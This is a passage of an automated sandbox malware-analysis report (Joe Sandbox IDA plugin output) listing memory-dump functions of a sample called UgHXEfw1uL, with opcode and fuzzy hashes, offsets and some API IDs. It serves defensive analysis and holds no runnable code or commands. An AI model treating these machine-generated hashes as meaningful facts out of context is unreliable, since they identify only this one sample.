                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                          • Instruction ID: 8fdf35345198f63d90869c8523650536940b1f5bf5a247da2ee87ceccab1cd17
                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                          • Instruction Fuzzy Hash: 6BF14B71E0161A9BDB14DF95C980BAEBBB5BF48714F088129ED05BB241E774EC42EB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b72d520a3dbed15565c9bbf375b2e4cc5f8b3cac8dc7310716afcadad7b1ccbc
                                          • Instruction ID: 17ef0a30416f9a6daf164b2805d81266183ae9d339ed7bc3384971a57eeefa86
                                          • Opcode Fuzzy Hash: b72d520a3dbed15565c9bbf375b2e4cc5f8b3cac8dc7310716afcadad7b1ccbc
                                          • Instruction Fuzzy Hash: C5D1D471E006199BDF04CF6AC841BFEB7B9AFC8354F18816AD455E7280DB39A906DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a70ea71642458b5413a2662fe981a42b22a94eef043963a3c0d44955a68551e2
                                          • Instruction ID: 8e6f62efab687b26953ce41f3ac4c783a0b86f29c354be5d97f624575ae3049c
                                          • Opcode Fuzzy Hash: a70ea71642458b5413a2662fe981a42b22a94eef043963a3c0d44955a68551e2
                                          • Instruction Fuzzy Hash: 1A515A72600A05DFDB25EFA4C980EAAB3F9FF047A4F510429EA41D7261D738EE45EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction ID: 025b014b0d17d408cc9f3cd01d767c810e9e9b5711d2199caa130c7561cbe34c
                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                          • Instruction Fuzzy Hash: 2C51DAB1D00219EFDF10DF90CC99BAEB778AF423A4F154655E51267191D7389E40F7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aab626f893c5fc029255e277ba45a647d1755e62391880f3eaba2a4cd0384225
                                          • Instruction ID: 5bc2e1b6e2c6b597d140a6a15091a33e9b2b9293044206f430bc378a05a82526
                                          • Opcode Fuzzy Hash: aab626f893c5fc029255e277ba45a647d1755e62391880f3eaba2a4cd0384225
                                          • Instruction Fuzzy Hash: CD419C36D00219DBCB14DF98C840AEDB7B4BF48721F24816AEE15E7350EB359D49EBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e44805c611d8331065e9676b67ef450aabec7d925eceb6ade94c3b79619d8e1
                                          • Instruction ID: 264eccd49c3b911297ed9d05ab7de6f3ccf8af1c90638adb22a24a44fb688210
                                          • Opcode Fuzzy Hash: 1e44805c611d8331065e9676b67ef450aabec7d925eceb6ade94c3b79619d8e1
                                          • Instruction Fuzzy Hash: 1841B5726043019FD724EF24C881A5BBBE5FF88324F144839EA56C7711DB39E848EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction ID: c9f7dcc4718d27af42b378d9abe1d03aea43ce96fd91ed26d2eb01bcbde04ed0
                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                          • Instruction Fuzzy Hash: D3514975E00619CFDB14CF99C480AAEF7B2FF84720F2881A9D815AB350D770AE42DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd3fa3a946471fde81449324309cf0239c2cb600663f0a38f4884214b8e46c27
                                          • Instruction ID: 9cb8ba66fb4a686affd53109772d08682aef68a17f8266b470071138926943f0
                                          • Opcode Fuzzy Hash: fd3fa3a946471fde81449324309cf0239c2cb600663f0a38f4884214b8e46c27
                                          • Instruction Fuzzy Hash: 49510471900126DBDB65DB64DC01BE8B7B1EF11324F1482A5E429E72D2DB79AD81EF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e393216b241529e98ecf72af5137d9652060fe762ab5bc0538debe5f748f9325
                                          • Instruction ID: 3a9f2183f74ce691515afa539c6c5bc209e06ab24f777160f621cdf3801605ff
                                          • Opcode Fuzzy Hash: e393216b241529e98ecf72af5137d9652060fe762ab5bc0538debe5f748f9325
                                          • Instruction Fuzzy Hash: 6141A572E402289BCB31DF64DD41BEE77B4EF49750F0141A6E908AB242DB78DE80DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction ID: 5b762e69358877deb1018cddeafa6deb336ca1a24efbf5076def38b648b9ca1b
                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                          • Instruction Fuzzy Hash: F641D875F00245ABDB14EF96CC81AAFB7BAAF84390F244069E809E7341DE74DD02D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82d1ae5d1df6b076f102f8358dee8e0e5a7966a22e96c8470661a952883e353d
                                          • Instruction ID: 9810e0dd9a81f2a7412f5c1bb9b1b4be0168f67189f2c10bc39a6913a39e4634
                                          • Opcode Fuzzy Hash: 82d1ae5d1df6b076f102f8358dee8e0e5a7966a22e96c8470661a952883e353d
                                          • Instruction Fuzzy Hash: BB41B3726007119FD725CF24D880A26B7F5FF49314B108A6EE54787B52EB35F885EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0b8bea03a549cfc7899db425798f042016a81d7a45f9d833e4c7a087c9542ad
                                          • Instruction ID: d4cd35e20831f118fe2bb771d8dc8897cd9798d4249904be335e8ec086bd7b69
                                          • Opcode Fuzzy Hash: a0b8bea03a549cfc7899db425798f042016a81d7a45f9d833e4c7a087c9542ad
                                          • Instruction Fuzzy Hash: 7341C532A80604CFCB20DF68D9557EE7BB0FF04360F1801AAD811AB3A5DB799D40EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2662ae52426d76417247dc31ad637d4cb068a0824c702821620be2e628a0ec1f
                                          • Instruction ID: 61add0bf157815e99c69421fb303fd579ed0db28545eb68d1416ac0090e3339c
                                          • Opcode Fuzzy Hash: 2662ae52426d76417247dc31ad637d4cb068a0824c702821620be2e628a0ec1f
                                          • Instruction Fuzzy Hash: D2410772901211CBC724DF58E841B9AB7B1FB84754F24812EE4019B356CB3DDD42EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f243e0009d2907ce6ff9e8af249bb57b7242a6c781e4463ba987986d557af2e
                                          • Instruction ID: 62f600dc601c6cda0049e5cf3cfae9792a81d57391239f3216d9b15a01fcb9e3
                                          • Opcode Fuzzy Hash: 9f243e0009d2907ce6ff9e8af249bb57b7242a6c781e4463ba987986d557af2e
                                          • Instruction Fuzzy Hash: 42419F325087069ED311DF64C941BABB7E8EF84B94F40092BF984D7250EB34DE45AB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction ID: aa7fb0e90cc01cc2ea56adca06ebb448de72d946ad533028c373d2c88aa76f6f
                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                          • Instruction Fuzzy Hash: E7412632E01211EBCB20DEA588407FAB761EF95B24F25C06BE8499B244D7358DC0FB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da4fbbc9e7a1e033c530a7f83ed12fd855d2a047c0dd6297a4ae4467fc996971
                                          • Instruction ID: 00e57ef950728e8959e7b4d1adc5fa179cff32c2477e88cf88e989c338405a3e
                                          • Opcode Fuzzy Hash: da4fbbc9e7a1e033c530a7f83ed12fd855d2a047c0dd6297a4ae4467fc996971
                                          • Instruction Fuzzy Hash: 0A417872A01710AFD321CF18D840B2AB7F4EF48724F64856AE4498B252EB79ED42DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction ID: 496e7348f430f9b562630c62e2fdf80a49991a93ad70435013a8b27dc93ca089
                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                          • Instruction Fuzzy Hash: 5F411B71A00605EFCB24CF98D980AAAB7F4FF18711B20496DEA56D7691D730EA48EF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d380628c5ca25936a9c4dc4be19e4e5e3f3b0e2978e0c23ced50ba6ee8d8210
                                          • Instruction ID: 23f350fc44660564a8c852e96a66a20c89b8cd017cd92e5fce6df109bb6f767b
                                          • Opcode Fuzzy Hash: 0d380628c5ca25936a9c4dc4be19e4e5e3f3b0e2978e0c23ced50ba6ee8d8210
                                          • Instruction Fuzzy Hash: 8541E472905710EFCB61EF24ED01B59B7B1FF44320F10826AD8469B2A1DB789941EF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5714ccee1d8a23bf8d72f24ff3a5b518e4c7548612485c91709f4eaabc7f29e
                                          • Instruction ID: 9f68a7a2ebb5edc3a21c97757ccdc5916d14a246465b38bdab8fb3d8ccbd3dde
                                          • Opcode Fuzzy Hash: d5714ccee1d8a23bf8d72f24ff3a5b518e4c7548612485c91709f4eaabc7f29e
                                          • Instruction Fuzzy Hash: 14319AB1A00349DFDB11CF68C440799BBF0FF09725F2081AAE509DB251D7369906EF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62092620529168d34f05ccf29d45c16c3bf73f1f1969bb65be63ca66ca1ce777
                                          • Instruction ID: e34b5c69fe079bb3fc21cdbfc524cf14a5a693577f140ae79ca0a34c4de3eecb
                                          • Opcode Fuzzy Hash: 62092620529168d34f05ccf29d45c16c3bf73f1f1969bb65be63ca66ca1ce777
                                          • Instruction Fuzzy Hash: 114183B19043019BD360DF24C845B9BBBE8FF88754F004A2AF598D7291DB789904DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e3cfc3eb6f6ab982b110aad02e9bcd71f0493218b8d747a606b9469cff405cb
                                          • Instruction ID: 257856f88963a04071d37c0d5e236d5cdd9e9941b65ba07d17b973367ca644ad
                                          • Opcode Fuzzy Hash: 0e3cfc3eb6f6ab982b110aad02e9bcd71f0493218b8d747a606b9469cff405cb
                                          • Instruction Fuzzy Hash: C041C2B2A086419FC320DF68E840A6AB3E9EFC9710F044629F89597680EB34ED14D7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 459d969ae3c0603fd38ac1f53d38da7209ecb145ff7be29810caadd9e2523580
                                          • Instruction ID: 20bff79d64098f4a11a73f7ac94368c3f685da770c2efbd6123dec977d9e5894
                                          • Opcode Fuzzy Hash: 459d969ae3c0603fd38ac1f53d38da7209ecb145ff7be29810caadd9e2523580
                                          • Instruction Fuzzy Hash: A641E431A003118BC725DF28E894B2BB7E9EF80760F14442DF9958B291DBB5ED81EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%


                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2bcb99ea060353e496d038f21c4b5c42d7e6a4032069c27a65644599edb69bbc
                                          • Instruction ID: f792def8e8e6b992799d323ec09abf099c78235de05bcf66faa74b85e0cd963c
                                          • Opcode Fuzzy Hash: 2bcb99ea060353e496d038f21c4b5c42d7e6a4032069c27a65644599edb69bbc
                                          • Instruction Fuzzy Hash: 4E318972A093118FD760DF19C841B6AB7E4EF88760F18496DE8889B391D774EC44EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction ID: 9279d1725b4737a8302bf79344bc78e28e8461ae13bba524b21a53f11db8fcb4
                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction Fuzzy Hash: BD314D72B00B01AFD761CF69DD41B57B7F8BF08B60F140A2DA99AC3650E630E904EB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e20b80a858096b58b1a3c93356d6281ea112867cea72ab15a36d8f632184db9
                                          • Instruction ID: 3e6ab1f393a2f122b242c770027609078d92014130457e4ff687cf67816e3056
                                          • Opcode Fuzzy Hash: 6e20b80a858096b58b1a3c93356d6281ea112867cea72ab15a36d8f632184db9
                                          • Instruction Fuzzy Hash: 5A319A719493428FC720DF19CA42A5ABBF1FF89328F4449AEF4889B251D335DE44DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b8de79e17ebb63faa6dde8870888f73f07472182eb3e9ff706b122117649334
                                          • Instruction ID: a3eba3ba79229b28a8de6eb6d692d79b677fe1c860a569a5aa18611bf09128e1
                                          • Opcode Fuzzy Hash: 0b8de79e17ebb63faa6dde8870888f73f07472182eb3e9ff706b122117649334
                                          • Instruction Fuzzy Hash: 1D31D632B002059FD720EFA4CD81B6E7BF9AB84704F104529EC55E72A5E738ED45EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                          • Instruction ID: 8ab540a7177cd70343a253a6e95307a081761ba61539b7ec98b3614fcc425ebb
                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                          • Instruction Fuzzy Hash: 33212636E4125AAACB10DFB58801BEFB7B5AF84750F168036AD59F7340E235DD40A7E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 151386e9d9b0c7984467fd14516612edb10501d3a2ef64b55d4746de55776e12
                                          • Instruction ID: d1255577908be84fc67c0cea9c3a9fd3b8dea107391af422849efae242364cba
                                          • Opcode Fuzzy Hash: 151386e9d9b0c7984467fd14516612edb10501d3a2ef64b55d4746de55776e12
                                          • Instruction Fuzzy Hash: 91313E729002108BC724AF14CC41B7977B4AF44324F94C56AEC899B342DE7DED82EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction ID: 42ca72a07ae5f09c685b7cdd84dc05a46575c96176c113f13c729328815ab7de
                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction Fuzzy Hash: D0212B36600652A6CB15EB958C11ABAB7B7EF40710F44801BF99587791E63CDD40E3E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c55e67e98af685fa63e3fee806f60c86d6d3db6b198840e5d6b195f7b52bd0f5
                                          • Instruction ID: 7a8b9666dcdf10531d688b2da1c899eaacf5315c632192faada2285cf301cab7
                                          • Opcode Fuzzy Hash: c55e67e98af685fa63e3fee806f60c86d6d3db6b198840e5d6b195f7b52bd0f5
                                          • Instruction Fuzzy Hash: 3331F936A4152C9BDB31DF14CC42FEEB7B9EB15750F0500A1F945A7290D678AEC0AF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73fe1012f418926f62440d5a16254b0bacd9bacd58f2f810a6207c1e2f0e122d
                                          • Instruction ID: 47004d53241665bb63657e03d30edc6f5eb6945e454145b3b59d56ebedfc6976
                                          • Opcode Fuzzy Hash: 73fe1012f418926f62440d5a16254b0bacd9bacd58f2f810a6207c1e2f0e122d
                                          • Instruction Fuzzy Hash: 1A21E172A047059BCB22DF18C880B6BB7E4FB88765F044529FE549B241E734ED44ABA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                          • Instruction ID: 80966274142d8d6061ae016557f235a21b9e41372619c9f08b93fef7ea6e1e79
                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                          • Instruction Fuzzy Hash: 03219136A00608EFCB11CF58C980B8EBBF5FF49719F508065EE259B241D674EE899B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction ID: ec76353b0e7100cc4c76d7f47eccfe59cb0e77faf5b88dc275ce6cfb36566ce3
                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction Fuzzy Hash: 33319F31600604EFD721CF68C884FAAB7F9EF85354F1445A9E956CB291E734EE41EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.2122639604.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_ef0000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7cf7a14ec62b7a5e6716ac3760d0326f6fed36d0e3819e77f131a6612d881192
                                          • Instruction ID: 855c94dd184f629c44ba17d93c69c63a83d99bb96581f8ff76a375ebfe18681d
